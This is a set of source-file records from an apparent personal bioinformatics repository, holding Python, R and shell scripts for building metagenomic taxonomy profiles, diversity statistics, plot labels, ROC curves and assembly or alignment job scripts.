default is phylum,genus,species.\", nargs='?')\nparser.add_argument('-o','--outdir',help = \"the output directory, full path.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\n(IDlist, directory, outdir) = (args.sampleID, args.directory, args.outdir)\npar = [IDlist, directory, outdir]\n\nif not all(par):\n\tparser.print_help()\n\texit()\n\nlevels = args.level if args.level else 'phylum,genus,species'\nlevel_list = levels.split(',')\n\nif os.path.exists(outdir):\n\tshutil.rmtree(outdir)\n\t\nos.makedirs(outdir)\nwith open(IDlist, 'r') as idfile:\n\tfor line in idfile:\n\t\tidlist= line.strip('\\n').split('\\t')\t\t\n\t\tfor sample in idlist:\n\t\t\tkrakfile = directory + '/' + sample + '.RemoveHost.krak'\n\t\t\treportfile = directory + '/' + sample + '.RemoveHost.report'\n\t\t\tline_number = os.popen('wc -l ' + krakfile).read()\n\t\t\treads_number = line_number.split(' ')[0]\t\t\t\n\t\t\twith open(reportfile, 'r') as report:\n\t\t\t\tfor line in report:\n\t\t\t\t\tline = line.strip('\\n')\n\t\t\t\t\tlst = line.split('\\t')\n\t\t\t\t\tname_list = lst[0].split('|')\n\t\t\t\t\tif 'kingdom' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_kingdom_profile.temp'\n\t\t\t\t\t\tif re.match('d__',name_list[-1]):\n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Kingdom:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Kingdom)\n\t\t# Phylum\t\n\t\t\t\t\tif 'phylum' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_phylum_profile.temp'\n\t\t\t\t\t\tif re.match('p__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Phylum:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Phylum)\n\t\t# Class\t\n\t\t\t\t\tif 'class' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_class_profile.temp'\n\t\t\t\t\t\tif re.match('c__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Class:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Class)\n\t\t# Order\n\t\t\t\t\tif 'order' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_order_profile.temp'\t\t\n\t\t\t\t\t\tif re.match('o__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Order:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), 
file=Order)\n\t\t#Family\n\t\t\t\t\tif 'family' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_family_profile.temp'\n\t\t\t\t\t\tif re.match('f__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Family:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Family)\n\t\t\t\t\t\n\t\t#Genus\n\t\t\t\t\tif 'genus' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_genus_profile.temp'\n\t\t\t\t\t\tif re.match('g__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Genus:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Genus)\n\n\t\t#Species \n\t\t\t\t\tif 'species' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_species_profile.temp'\n\t\t\t\t\t\tif re.match('s__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Species:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Species)\t\n\n# merge and output\nfor tax in level_list:\n\tframe = pd.DataFrame()\n\tdt_list = list()\n\twith open(IDlist, 'r') as idfile:\n\t\tfor line in idfile:\n\t\t\tidlist= line.strip('\\n').split('\\t')\n\t\t\tfor sample in idlist:\n\t\t\t\tfilename = outdir + '/' + sample + '_' + tax + '_profile.temp'\n\t\t\t\tdf = pd.read_table(filename,names=[sample], index_col = 0)\n\t\t\t\tdt_list.append(df)\n\t\t\tframe = pd.concat(dt_list, axis=1)\n\t\t\tframe.fillna(value=0, inplace=True)\n\t\t\toutname = outdir + '/' + tax + 'ProfileTable.xls'\n\t\t\tframe.to_csv(outname,sep='\\t') \n\nneedremove = outdir + '/*profile.temp'\nos.system('rm ' + needremove)\n"
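\n# Input format assumed by the parsing above (an mpa-style lineage report, an\n# assumption inferred from the split on '|'): each .report line looks like\n#   d__Bacteria|p__Firmicutes\\t123456\n# and the relative abundance is that clade's read count divided by the total\n# read count of the matching .krak file.\n"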
},
{
"alpha_fraction": 0.6879350543022156,
"alphanum_fraction": 0.6983758807182312,
"avg_line_length": 25.9375,
"blob_id": "9d54ca7ab6b0151afc81eb6bf8fe9fea28f8d290",
"content_id": "3402c81150ec5a6ddc40d9ce9af8a84870c6e00a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 862,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 32,
"path": "/rat/beta/beta.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport sys,os,shutil\nif len(sys.argv) != 3:\n print('you silly fool~~ (hahaha kidding,please check your parameters)')\n exit()\nbetadir = sys.argv[1]\nabdfile = sys.argv[2]\ntitle = sys.argv[3]\nos.chdir(betadir)\nif not os.path.exists('Outdir'):\n\tos.makedirs('Outdir')\nelse:\n\tshutil.rmtree('Outdir')\n\tos.makedirs('Outdir')\n#generate the distance file\nos.system('python3 braycurtis.py -i ' + abdfile)\n\nos.chdir('Outdir')\nos.system('mkdir Fexpose Mexpose Frecovery Mrecovery')\n\n#split the distance file\nos.system('python3 beta_diversity.py ../braycurtis.txt ./')\n\n#merge the distance file and run anova\nparent_dir = betadir + '/Outdir'\nos.system('python3 process.py ' + parent_dir + ' ' + title)\n\n#scp the pdf files to Mac\nos.system('sh scp.sh')\n\n# print p values\nos.system('python3 pvalue.py ' + parent_dir + '>' + parent_dir + '/pvalue.txt')\n"
},
{
"alpha_fraction": 0.5040621757507324,
"alphanum_fraction": 0.5934298634529114,
"avg_line_length": 40.617645263671875,
"blob_id": "042c329a56fd0a1a0f8704f0fa94426d9b2d57ae",
"content_id": "509ce69507c5c6c005331377ff90d24e0aee7d35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3071,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 68,
"path": "/Taxonomy/diff_label.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\n## 在同事差异物种脚本的基础上,为箱线图生成显著性的标识 **/* 等,只适用于三组的两两标识;其他组别待开发;\n## 属水平\ngroup = ['NS', 'FS', 'CS'] # 要和下边的差异文件对应, g1,g2,g3\n\ng1_g2 = pd.read_table('genus.FS-NS.wilcox.test.xls', index_col = 0)\ng2_g3 = pd.read_table('genus.CS-FS.wilcox.test.xls', index_col = 0)\ng1_g3 = pd.read_table('genus.CS-NS.wilcox.test.xls', index_col = 0)\n\n## 同事画图文件\ndt = pd.read_table(\"genus.relab_profile.xls\", index_col = 0)\n#dt = dt.drop(['Others'], axis = 1)\ntax = list(dt.columns[1:]) # 不要 group\n#tax.remove('Others')\n\ndt_max = dt.groupby('Group').max() # 取得最大值\n#import numpy as np\n\n## g1 and g2 \ng1_g2_max = dt_max.loc[[group[0], group[1]]].max() + 0.2 # 获得两两分组物种的最大值\ng1_g2_order = g1_g2.loc[tax]\ng1_g2_order['lab'] = g1_g2_order.apply(lambda x: '***' if x.qvalue < 0.001 else ( '**' if x.qvalue < 0.01 else ('*' if x.qvalue < 0.05 else 'NA')), axis =1)\nx2 = [tax.index(item) + 1 for item in tax] # 左坐标\nx1 = [item - 0.3 for item in x2] #右坐标\nxstar = [item - 0.15 for item in x2] # ** 位置\ng1_g2_order['x1'] = x1\ng1_g2_order['x2'] = x2\ng1_g2_order['xstar'] = xstar\ng1_g2_order['y1'] = g1_g2_max.loc[tax]\ng1_g2_order['y2'] = g1_g2_max.loc[tax] + 0.1\ng1_g2_order['ystar'] = g1_g2_max.loc[tax] + 0.2\ng1_g2_sig = g1_g2_order.loc[g1_g2_order['lab'] != 'NA'].loc[:,['x1', 'x2', 'xstar', 'y1', 'y2', 'ystar', 'lab']]\ng1_g2_sig\n\n## g1 and g3 \ng1_g3_max = dt_max.loc[[group[0], group[2]]].max() + 0.2 # 或者两两分组物种的最大值\ng1_g3_order = g1_g3.loc[tax]\ng1_g3_order['lab'] = g1_g3_order.apply(lambda x: '***' if x.qvalue < 0.001 else ( '**' if x.qvalue < 0.01 else ('*' if x.qvalue < 0.05 else 'NA')), axis =1)\nx1 = [tax.index(item) + 1 - 0.3 for item in tax] \nx2 = [item + 0.6 for item in x1]\nxstar = [item - 0.3 for item in x2]\ng1_g3_order['x1'] = x1\ng1_g3_order['x2'] = x2\ng1_g3_order['xstar'] = xstar\ng1_g3_order['y1'] = g1_g3_max.loc[tax] \ng1_g3_order['y2'] = g1_g3_max.loc[tax] + 0.1\ng1_g3_order['ystar'] = g1_g3_max.loc[tax] + 0.2\ng1_g3_sig = g1_g3_order.loc[g1_g3_order['lab'] != 'NA'].loc[:,['x1', 'x2', 'xstar', 'y1', 'y2', 'ystar', 'lab']]\ng1_g3_sig\n\n\n## g2 and g3 \ng2_g3_max = dt_max.loc[[group[1], group[2]]].max() + 0.2 # 或者两两分组物种的最大值\ng2_g3_order = g2_g3.loc[tax]\ng2_g3_order['lab'] = g2_g3_order.apply(lambda x: '***' if x.qvalue < 0.001 else ( '**' if x.qvalue < 0.01 else ('*' if x.qvalue < 0.05 else 'NA')), axis =1)\nx1 = [tax.index(item) + 1 for item in tax] \nx2 = [item + 0.3 for item in x1]\nxstar = [item - 0.15 for item in x2]\ng2_g3_order['x1'] = x1\ng2_g3_order['x2'] = x2\ng2_g3_order['xstar'] = xstar\ng2_g3_order['y1'] = g2_g3_max.loc[tax]\ng2_g3_order['y2'] = g2_g3_max.loc[tax] + 0.1\ng2_g3_order['ystar'] = g2_g3_max.loc[tax] + 0.2\ng2_g3_sig = g2_g3_order.loc[g2_g3_order['lab'] != 'NA'].loc[:,['x1', 'x2', 'xstar', 'y1', 'y2', 'ystar', 'lab']]\ng2_g3_sig\n\nall_dt = pd.concat([g1_g2_sig,g1_g3_sig, g2_g3_sig])\nall_dt.to_csv('genus_plabel.txt', sep = '\\t')\n"
},
{
"alpha_fraction": 0.7178988456726074,
"alphanum_fraction": 0.731517493724823,
"avg_line_length": 50.29999923706055,
"blob_id": "55c2776724a1cf2e3042a04b61d452f87d759d5b",
"content_id": "97a4a753d7bcec8a8707bf7bae3edaacce80fc79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 724,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 10,
"path": "/numToid.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#过滤出来至少在 10% 样品中存在的基因编号后,需要得到相应的基因 ID (因为之前基因长度文件配置的缘故,现在要替换回来).没有用字典,试着用 pandas 的 concat 功能, 将两个数据集按照行索引取交集合并,提取编号和与之对应的 ID, 单独输出到文件.\n#主要是想多试试用 pandas.\n\n#! /usr/bin/python3\nimport pandas as pd\ndf = pd.read_table('tempNon-redundant_Gene_Catalog_length_gc.xls.gz', compression='gzip', header=0, index_col=0)\ndt = pd.read_table('GeneOfTen.txt', header=None, names=['geneNum','sampleNum'], index_col=0)\nmerge = pd.concat([df,dt], axis=1, join='inner')\nnumToid = merge['Name']\nnumToid.to_csv('numToid.txt', sep='\\t')\n\n"
},
{
"alpha_fraction": 0.7430199384689331,
"alphanum_fraction": 0.7498575448989868,
"avg_line_length": 49.14285659790039,
"blob_id": "bc1809466e1a6083ad599b751ba5ec973ccaaff4",
"content_id": "f4ae46d84a1fa6eea008791a3bff54493d2a7354",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1837,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 35,
"path": "/split_by_sex.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 合并暴露期和恢复期不同剂量的,由性别分割,重新生成四个多样性的表格,用于 annova 的差异检验\nimport pandas as pd\ndt = pd.read_table('diversity.txt', header=0)\ndt.columns.values[0] = 'SampleID'\ndf = dt.set_index('SampleID')\n\n\n# diversity file \nrecoveryDf = df.loc[df.index.str.contains('-a'),:]\nexposeDf = df.loc[df.index.str.contains('-a') == False,:]\nFexposeDf = exposeDf.loc[exposeDf.index.str.contains('F\\d', regex=True),:]\nMexposeDf = exposeDf.loc[exposeDf.index.str.contains('F\\d', regex=True) == False,:]\nFrecoveryDf = recoveryDf.loc[recoveryDf.index.str.contains('F\\d', regex=True),:]\nMrecoveryDf = recoveryDf.loc[recoveryDf.index.str.contains('F\\d', regex=True) == False,:]\n\n#group file\nexposeGroup = pd.read_table('Sample_information_detail.txt', header=0, index_col=0)\nrecoveryGroup = pd.read_table('2_Sample_information_detail.xls', header=0, index_col=0)\nFexposeGroup = exposeGroup.loc[exposeGroup.index.str.contains('F\\d', regex=True),:]\nMexposeGroup = exposeGroup.loc[exposeGroup.index.str.contains('F\\d', regex=True) == False,:]\nFrecoveryGroup = recoveryGroup.loc[recoveryGroup.index.str.contains('F\\d', regex=True),:]\nMrecoveryGroup = recoveryGroup.loc[recoveryGroup.index.str.contains('F\\d', regex=True) == False,:]\n\n# merge file for R analysis\nFexposeDiversity = pd.concat([FexposeDf,FexposeGroup], axis=1)\nMexposeDiversity = pd.concat([MexposeDf,MexposeGroup], axis=1)\nFrecoveryDiversity = pd.concat([FrecoveryDf,FrecoveryGroup], axis=1)\nMrecoveryDiversity = pd.concat([MrecoveryDf,MrecoveryGroup], axis=1)\n\n# output\nFexposeDiversity.to_csv('FexposeDiversity.txt', sep='\\t')\nMexposeDiversity.to_csv('MexposeDiversity.txt', sep='\\t')\nFrecoveryDiversity.to_csv('FrecoveryDiversity.txt', sep='\\t')\nMrecoveryDiversity.to_csv('MrecoveryDiversity.txt', sep='\\t')\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 11,
"blob_id": "0850dec03013855b7e15a7a6335f6d2f6c8b7790",
"content_id": "35ab15a573221abcf90c3c26673451cf15381e1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 1,
"path": "/Paper_information/files/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "脚本需要的文件 +。+\n"
},
{
"alpha_fraction": 0.6095772385597229,
"alphanum_fraction": 0.664365828037262,
"avg_line_length": 58.410255432128906,
"blob_id": "30d8a8512dd8768a1621c0d24bd03a2d94064a40",
"content_id": "2aca536da5ae4e8de942812a07ff0312378c0250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2628,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 39,
"path": "/Phenotype/multi_roc.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#使用 pROC 画表型数据的多条 ROC\nlibrary(pROC) # install with install.packages(\"pROC\")\nlibrary(randomForest) \nlibrary(dplyr)\ndt = read.table('Phenotype.xls', sep = '\\t', head = T, row.names = 1) # 表型文件,格式:列名为样品名,组别以及表型信息;\n\ntemp = rownames(dt)\ndt = dt %>% mutate(Disease = ifelse(Group == 'NCA', 0, 1)) # 增加一列,将组别信息转化为 0,1\nrownames(dt)= temp\nhead(dt)\n\n#par(mar=c(3, 3, 3, 2))\npdf(\"phenotype_roc.pdf\",width=3, height=3, onefile=FALSE) # 因为表型有不少缺失值,剔除\nsub_dt = dt[complete.cases(dt['TC']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$TC)\nroc(sub_dt$Disease, rf.model$votes[,1], plot=TRUE, legacy.axes=TRUE, xlab=\"1 - specificity\", ylab=\"sensitivity\", col=\"#3fadaf\", lwd=1, print.auc=F, print.auc.cex=0.5, cex.lab=0.7, cex.axis = 0.7, tck = -0.02, mgp=c(1,0.2,0)) #调整画图的参数;\n#p = roc(sub_dt$Disease, rf.model$votes[,1], plot=TRUE, legacy.axes=TRUE, xlab=\"1 - specificity\", ylab=\"sensitivity\", col=\"#3fadaf\", lwd=1, print.auc=F, print.auc.cex=0.5, cex.lab=0.7, cex.axis = 0.7, tck = -0.02, mgp=c(1,0.2,0)) #调整画图的参数;\n#print(p$auc) # 这样可以直接输出 auc 值;\n\nsub_dt = dt[complete.cases(dt['LDLC']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$LDLC)\nplot.roc(sub_dt$Disease, rf.model$votes[,1] , col=\"#ca5477\", lwd=1, print.auc=F, print.auc.cex=0.5, add=TRUE, print.auc.y=0.45) # 所有的 print.auc 设置为否,因为出来不好看,后边在 legend 需要自定义\n\nsub_dt = dt[complete.cases(dt['cTnI']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$cTnI)\nplot.roc(sub_dt$Disease, rf.model$votes[,1], col=\"#76a44a\", lwd=1, print.auc=F, add=TRUE, print.auc.cex=0.5, print.auc.y=0.4)\n\nsub_dt = dt[complete.cases(dt['CKMB']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$CKMB)\nplot.roc(sub_dt$Disease, rf.model$votes[,1], col=\"#946ec6\", lwd=1, print.auc=F, add=TRUE, print.auc.cex=0.5, print.auc.y=0.35)\n\nsub_dt = dt[complete.cases(dt['MYO']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$MYO)\nplot.roc(sub_dt$Disease, rf.model$votes[,1], col=\"#c57b3d\", lwd=1, print.auc=F, add=TRUE, print.auc.cex=0.5, print.auc.y=0.3)\n\nlegend(\"bottomright\", legend=c(\"TC_AUC: 0.609\", \"LDLC_AUC: 0.616\", \"CKMB_AUC: 0.671\", \"MYO_AUC: 0.842\", \"cTnI_AUC: 0.866\"), col=c(\"#3fadaf\", \"#ca5477\", \"#946ec6\", \"#c57b3d\", \"#76a44a\"), lwd=1, cex=0.31, pt.cex = 1, bty = \"n\") # legend 以及参数\ndev.off()\n\n# 这里手动输入 图例元素 还是有点儿笨拙,待优化,时间关系,后边再说,完成任务最重要;\n\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.7604166865348816,
"avg_line_length": 23,
"blob_id": "91f5f17cea9f201c47875dc32a6f62853937aabb",
"content_id": "62007f64af8d4f027cb9c8b7f0f8cd4bfe3170f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 4,
"path": "/rat/scp.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "for x in `ls *pdf`\ndo\n\texpect scp.expect $x /Users/tongxueer/Documents/20180116-大鼠项目/genus\ndone\n"
},
{
"alpha_fraction": 0.7008309960365295,
"alphanum_fraction": 0.7091412544250488,
"avg_line_length": 44,
"blob_id": "f55a21eb592247a45f22e8fd8f72b1dc65176b01",
"content_id": "e2d42bf04106524ec93b169ed36542515058d995",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 8,
"path": "/calypso.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 将物种丰度表处理成 Calyps 软件能够接受的输入文件\nimport pandas as pd\ndt = pd.read_table('phylumProfileTable.xls')\nPhylum = pd.Series(['phylum'] * len(dt.index.values)) #生成和行数相同的 phylum \ndt = pd.concat([Phylum,dt], axis=1) # 合并,横向合并\ndt.columns.values[0] = 'Phylum' \ndt.columns.values[1] = 'Header' #对列名进行重命名\ndt.to_csv('Calypso_phylum.txt', sep='\\t', index=False) #输出,并且关闭输出掉索引值\n\n"
},
{
"alpha_fraction": 0.534246563911438,
"alphanum_fraction": 0.5391389727592468,
"avg_line_length": 39.880001068115234,
"blob_id": "51dfa19937296d442c1d02da0c2508b02b510462",
"content_id": "3967bf0cd2e56ae0cf6b18c4d8ae94c65cbf40c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 25,
"path": "/Phenotype/con_result.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 接同事对连续型变量差异检验的文件,输出发表文章格式的表格;之所以离散型和连续型变量分开,是因为两种数据的处理方式不一样,后边再找机会看能不能合并吧;\n# 输出格式为 mean(sd) ... p 值\nimport re\ngroup_list = 'NS:FS:CS'.split(':')\nindice = 'Age:BMI'.split(':')\nout = open('Final_Result.NS-FS-CS.mixcon.xls', 'w')\ndt = pd.read_table('Result.NS-FS-CS.mixcon.xls', sep = '\\t', index_col = 0)\nprint('Characteristic\\t' + '\\t'.join(group_list) + '\\tP value', file = out)\nfor x in indice:\n # print(x +',mean(sd)' + '\\t'*len(group_list) + '%.2e' % dt.loc[x]['pvalue'])\n sub_dt = dt.loc[x]\n line = ''\n for group in group_list:\n Mean = 'mean('+ group + ')' \n Sd = 'sd('+ group + ')' \n for colname in sub_dt.index:\n if colname == Mean:\n group_mean = str(round(sub_dt[colname],2))\n line = line + '\\t'+ group_mean\n\n if colname == Sd:\n group_sd = '('+str(round(sub_dt[colname],2))+')'\n line = line + group_sd\n print(x +',mean(sd)' + line + '\\t%.2e' % dt.loc[x]['pvalue'], file = out) #科学计数法\nout.close()\n"
},
{
"alpha_fraction": 0.6562607288360596,
"alphanum_fraction": 0.6819897294044495,
"avg_line_length": 46.78688430786133,
"blob_id": "982a3c73ab1dca5caa73ef45cc02a4764d28160e",
"content_id": "21cc2b65b5f7caaebfa1bbb700bb015ef0f6ebc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2915,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 61,
"path": "/getScript.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,os,shutil\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the assembly script for each sample.\nExample: python3 diversity.py -i GeneCatalog_profile.xls.gz\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the RemoveHost_Data.list file.\")\nparser.add_argument('-s','--tool', help = \"megahit (default) or metaspades.\")\n#parser.add_argument('-p','--process', help = \"the directory for results.\")\nparser.add_argument('-o','--outdir',help = \"the output directory, full path.\")\n#parser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\n(removeHostList,tool,outdir) = (args.Input,args.tool,args.outdir)\npar = [removeHostList,tool,outdir]\n\nif not all(par):\n\tparser.print_help()\n\texit()\n\nif os.path.exists(outdir):\n#\tos.removedirs(outdir)\n\tshutil.rmtree(outdir)\n\nos.makedirs(outdir)\t\nshelldir = outdir + '/shell'\nprocessdir = outdir + '/process'\nos.makedirs(shelldir)\nos.makedirs(processdir)\n\nwith open(removeHostList,'r') as IN:\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\t(ID,rmfq1,rmfq2) = (lst[0],lst[1],lst[2])\n\t\tshellIDdir = shelldir + '/' + ID\n\t\tos.makedirs(shellIDdir)\n\t\tshellfile_path = shellIDdir + '/' + ID + '_assembly.sh'\n\t\tprocessIDdir = processdir + '/' + ID \n\t\tos.makedirs(processIDdir) # make sample dir\n\t\tgunzip_rmfq1_path = processIDdir +'/' + ID + '.RemoveHost_1.fastq'\n\t\tgunzip_rmfq2_path = processIDdir +'/' + ID + '.RemoveHost_2.fastq'\n\t\tmetawrap_path = '/ifswh1/BC_PUB/biosoft/BC_NQ/01.Soft/03.Soft_ALL/metaWRAP-181018/bin/metawrap'\n\t\tout = open(shellfile_path,'w') \n\t\tprint('export PATH=/ifswh1/BC_PS/wangpeng7/Software/metaWRAP-181018/bin:$PATH', file=out)\n\t\tprint('export PATH=/ifswh1/BC_PS/wangpeng7/Software/metaSPAdes/SPAdes-3.13.0-Linux/bin:$PATH', file=out)\n\t\tprint('export PATH=/ifswh1/BC_PUB/biosoft/BC_NQ/01.Soft/03.Soft_ALL/Python-2.7.5/Built/bin:$PATH', file=out) # for quast\n\t\tprint('export PATH=/ifswh1/BC_PUB/biosoft/pipeline/MICRO/Meta/Meta_Metagenomic_Survey_2017a/modules/Assembly/Assembly_megahit/bin/megahit:$PATH', file=out)\n\t\tprint('gunzip -c ' + rmfq1 + ' > ' + gunzip_rmfq1_path, file=out)\n\t\tprint('gunzip -c ' + rmfq2 + ' > ' + gunzip_rmfq2_path, file=out)\n\t\tif tool == 'metaspades':\n\t\t\tprint(metawrap_path + ' assembly -1 ' + gunzip_rmfq1_path + ' -2 ' + gunzip_rmfq2_path + ' -m 100 -t 20 --metaspades -o ' + processIDdir, file=out) # later change the par\n\t\telse:\n\t\t\tprint(metawrap_path + ' assembly -1 ' + gunzip_rmfq1_path + ' -2 ' + gunzip_rmfq2_path + ' -m 100 -t 20 --megahit -o ' + processIDdir, file=out)\n\t\tprint('rm ' + gunzip_rmfq1_path, file=out)\n \tprint('rm ' + gunzip_rmfq2_path, file=out)\n"
},
{
"alpha_fraction": 0.6399112939834595,
"alphanum_fraction": 0.6563193202018738,
"avg_line_length": 40,
"blob_id": "ab859c6e6019deeb35a20d2fb5869aac5ab935e5",
"content_id": "165f7fe30924b107eaced7122d2ae7e53f31c4c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2255,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 55,
"path": "/GeneAbundance/align.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,re,os,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the process directory and shell directory of soap alignment.\nTo be continued.\n------------------'''\n)\nparser.add_argument('rmhost', help = \"the removehost fastq file list.\")\nparser.add_argument('soap', help = \"soap path.\")\nparser.add_argument('index', help = \"the index file directory.\")\nparser.add_argument('outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\n(listfile,soap_path,index_dir) = (args.rmhost, args.soap, args.index)\npar = [listfile,soap_path,index_dir]\noutdir = args.outdir if args.outdir else './'\n\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\t\n\nindex_list = list()\nfor item in glob.glob(index_dir + '/all_assembly.fasta.index.amb'):\n#for item in glob.glob(index_dir + '/AA11A_final_assembly.fasta.index.amb'):\n#for item in glob.glob(index_dir + '/AA12A_final_assembly.fasta.index.amb'):\n#for item in glob.glob(index_dir + '/AA4A_final_assembly.fasta.index.amb'):\n\tmatch = re.search('(.*)\\.amb', item)\n\tindex = match.group(1)\n\tindex_list.append(index)\nindex_par = '-D ' + ' -D '.join(index_list)\n#print(index_par)\n\nwith open(listfile,'r') as IN:\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\t(sampleID,fq1,fq2) = (lst[0],lst[1],lst[2])\n\t\tprocessPath = outdir + '/Process/' + sampleID\n\t\tshellPath = outdir + '/Shell/' + sampleID\n\t\tif not os.path.exists(processPath):\n\t\t\tos.makedirs(processPath)\n\t\tif not os.path.exists(shellPath):\n\t\t\tos.makedirs(shellPath)\t\t\n\t\tfilepath = shellPath + '/' + sampleID + '.sh'\n\t\toutpe = processPath + '/' + sampleID + '.soap.pe'\n\t\toutse = processPath + '/' + sampleID +'.soap.se'\n\t\toutlog = processPath + '/' + sampleID +'.soap.log'\t\n\t\tpara = '-m 200 -x 1000 -r 2 -v 13 -p 12 -l 32 -s 75 -c 0.95'\n\t\tshell = ' '.join([soap_path,'-a',fq1,'-b',fq2, index_par,'-o',outpe,'-2',outse,para])\n\t\twith open (filepath,'w') as out:\n\t\t\tout.write(shell + ' 2>' + outlog + '\\n')\n\t\t\tout.write('gzip -f ' + outpe + '\\n')\n\t\t\tout.write('gzip -f ' + outse + '\\n')\n"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.5987654328346252,
"avg_line_length": 13.727272987365723,
"blob_id": "1c5928947e5c1bd8f690d79f84105d3cae4779a6",
"content_id": "462dc034a60b502519ffeacd12e38645450f5c4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/GeneAbundance/qsub.sh",
